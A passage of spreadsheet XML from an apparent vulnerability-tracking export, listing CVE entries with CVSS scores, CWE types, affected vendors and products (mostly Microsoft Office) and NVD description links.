      <c r="H1557" s="5" t="inlineStr"/>
      <c r="I1557" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1557" s="5" t="inlineStr"/>
      <c r="K1557" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L1557" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78502</t>
        </is>
      </c>
      <c r="C1558" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1558" s="5" t="inlineStr"/>
      <c r="F1558" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1558" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1558" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1558" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1558" s="5" t="inlineStr"/>
      <c r="K1558" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1558" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t>
        </is>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78503</t>
        </is>
      </c>
      <c r="C1559" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1559" s="5" t="inlineStr"/>
      <c r="F1559" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1559" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1559" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1559" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1559" s="5" t="inlineStr"/>
      <c r="K1559" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1559" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t>
        </is>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78515</t>
        </is>
      </c>
      <c r="C1560" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1560" s="5" t="inlineStr"/>
      <c r="F1560" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1560" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1560" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1560" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1560" s="5" t="inlineStr"/>
      <c r="K1560" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1560" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t>
        </is>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78520</t>
        </is>
      </c>
      <c r="C1561" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1561" s="5" t="inlineStr"/>
      <c r="F1561" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1561" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1561" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1561" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1561" s="5" t="inlineStr"/>
      <c r="K1561" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1561" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78520</t>
        </is>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78522</t>
        </is>
      </c>
      <c r="C1562" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1562" s="5" t="inlineStr"/>
      <c r="F1562" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1562" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1562" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1562" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1562" s="5" t="inlineStr"/>
      <c r="K1562" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1562" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78522</t>
        </is>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78658</t>
        </is>
      </c>
      <c r="C1563" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1563" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1563" s="5" t="inlineStr"/>
      <c r="F1563" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1563" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1563" s="5" t="inlineStr"/>
      <c r="I1563" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1563" s="5" t="inlineStr"/>
      <c r="K1563" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L1563" s="5" t="inlineStr">
        <is>
          <t>IBM UCD - IBM UrbanCode Deploy 7.2 through 7.2.3.25, and 7.3 through 7.3.2.20 and IBM UCD - IBM DevOps Deploy 8.0 through 8.0.1.15, 8.1 through 8.1.2.8, and 8.2 through 8.2.2.1 IBM DevOps Deploy / IBM UrbanCode Deploy (UCD) is susceptible to an formation disclosure vulnerability when processing redacted property values. If a deployment is configured with a secure property that starts with certain non-ASCII characters, the redaction engine may fail to mask subsequent ASCII secure values embedded inside unsecure properties. An authenticated user with permissions to view deployment request details could exploit this flaw via the UI or API to view sensitive values in plain text that should otherwise be redacted.</t>
        </is>
      </c>
      <c r="M1563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78658</t>
        </is>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78838</t>
        </is>
      </c>
      <c r="C1564" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1564" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1564" s="5" t="inlineStr"/>
      <c r="F1564" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1564" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1564" s="5" t="inlineStr"/>
      <c r="I1564" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1564" s="5" t="inlineStr"/>
      <c r="K1564" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1564" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the grid_datasource.php component of AppNitro MachForm v30 allows attackers to execute arbitrary Javascript in the context of the victim's browser via injecting a crafted payload into the filter[filters][0][field] parameter.</t>
        </is>
      </c>
      <c r="M1564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78838</t>
        </is>
      </c>
    </row>
    <row r="1565">
      <c r="A1565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79725</t>
        </is>
      </c>
      <c r="C1565" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1565" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1565" s="5" t="inlineStr"/>
      <c r="F1565" s="5" t="inlineStr"/>
      <c r="G1565" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1565" s="5" t="inlineStr"/>
      <c r="I1565" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1565" s="5" t="inlineStr"/>
      <c r="K1565" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1565" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to read arbitrary files due to improper access control.</t>
        </is>
      </c>
      <c r="M1565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79725</t>
        </is>
      </c>
    </row>
    <row r="1566">
      <c r="A1566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80073</t>
        </is>
      </c>
      <c r="C1566" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1566" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1566" s="5" t="inlineStr"/>
      <c r="F1566" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1566" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1566" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I1566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1566" s="5" t="inlineStr"/>
      <c r="K1566" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1566" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80073</t>
        </is>
      </c>
    </row>
    <row r="1567">
      <c r="A1567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80076</t>
        </is>
      </c>
      <c r="C1567" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1567" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1567" s="5" t="inlineStr"/>
      <c r="F1567" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1567" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1567" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1567" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1567" s="5" t="inlineStr"/>
      <c r="K1567" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1567" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80076</t>
        </is>
      </c>
    </row>
    <row r="1568">
      <c r="A1568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80078</t>
        </is>
      </c>
      <c r="C1568" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1568" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1568" s="5" t="inlineStr"/>
      <c r="F1568" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1568" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1568" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1568" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1568" s="5" t="inlineStr"/>
      <c r="K1568" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1568" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80078</t>
        </is>
      </c>
    </row>
    <row r="1569">
      <c r="A1569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80079</t>
        </is>
      </c>
      <c r="C1569" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1569" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1569" s="5" t="inlineStr"/>
      <c r="F1569" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1569" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1569" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1569" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1569" s="5" t="inlineStr"/>
      <c r="K1569" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1569" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80079</t>
        </is>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80082</t>
        </is>
      </c>
      <c r="C1570" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1570" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1570" s="5" t="inlineStr"/>
      <c r="F1570" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1570" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1570" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1570" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1570" s="5" t="inlineStr"/>
      <c r="K1570" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1570" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80082</t>
        </is>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80084</t>
        </is>
      </c>
      <c r="C1571" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1571" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1571" s="5" t="inlineStr"/>
      <c r="F1571" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1571" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1571" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1571" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1571" s="5" t="inlineStr"/>
      <c r="K1571" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1571" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t>
        </is>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80086</t>
        </is>
      </c>
      <c r="C1572" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1572" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1572" s="5" t="inlineStr"/>
      <c r="F1572" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1572" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1572" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1572" s="5" t="inlineStr"/>
      <c r="K1572" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1572" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t>
        </is>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80087</t>
        </is>
      </c>
      <c r="C1573" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1573" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1573" s="5" t="inlineStr"/>
      <c r="F1573" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1573" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1573" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1573" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1573" s="5" t="inlineStr"/>
      <c r="K1573" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1573" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t>
        </is>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80088</t>
        </is>
      </c>
      <c r="C1574" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1574" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1574" s="5" t="inlineStr"/>
      <c r="F1574" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1574" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1574" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1574" s="5" t="inlineStr"/>
      <c r="K1574" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1574" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t>
        </is>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80089</t>
        </is>
      </c>
      <c r="C1575" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1575" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1575" s="5" t="inlineStr"/>
      <c r="F1575" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1575" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1575" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1575" s="5" t="inlineStr"/>
      <c r="K1575" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1575" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t>
        </is>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80090</t>
        </is>
      </c>
      <c r="C1576" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1576" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1576" s="5" t="inlineStr"/>
      <c r="F1576" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1576" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1576" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1576" s="5" t="inlineStr"/>
      <c r="K1576" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1576" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t>
        </is>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80091</t>
        </is>
      </c>
      <c r="C1577" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1577" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1577" s="5" t="inlineStr"/>
      <c r="F1577" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1577" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1577" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1577" s="5" t="inlineStr"/>
      <c r="K1577" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1577" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t>
        </is>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84365</t>
        </is>
      </c>
      <c r="C1578" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1578" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1578" s="5" t="inlineStr"/>
      <c r="F1578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1578" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1578" s="5" t="inlineStr"/>
      <c r="I1578" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1578" s="5" t="inlineStr"/>
      <c r="K1578" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1578" s="5" t="inlineStr">
        <is>
